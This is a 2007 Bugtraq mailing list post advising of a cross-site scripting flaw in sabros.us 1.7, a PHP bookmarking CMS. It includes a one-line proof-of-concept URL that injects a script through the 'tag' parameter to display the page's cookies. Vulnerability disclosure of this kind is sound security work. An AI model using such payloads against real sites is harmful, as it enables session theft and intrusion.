Bugtraq mailing list archives
[x0n3-h4ck] sabros.us 1.7 XSS Exploit
From: corrado.liotta () alice it
Date: 18 Jan 2007 19:11:52 -0000
-=[--------------------ADVISORY-------------------]=- sabros.us 1.7 Author: CorryL [corryl80 () gmail com] -=[-----------------------------------------------]=- -=[+] Application: sabros.us -=[+] Version: 1.7 -=[+] Vendor's URL: http://sourceforge.net/projects/sabrosus/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. sabros.us is a CMS to put your bookmarks online with folksonomy support; just like del.icio.us, but the big diference is you will have the complete control of the source code and written on PHP with MySQL as backend we make it cross platform. ..::[ Proof Of Concept ]::.. http://remote-server/index.php?tag=</title><script>alert(document.cookie)</script>
Current thread:
- [x0n3-h4ck] sabros.us 1.7 XSS Exploit corrado . liotta (Jan 18)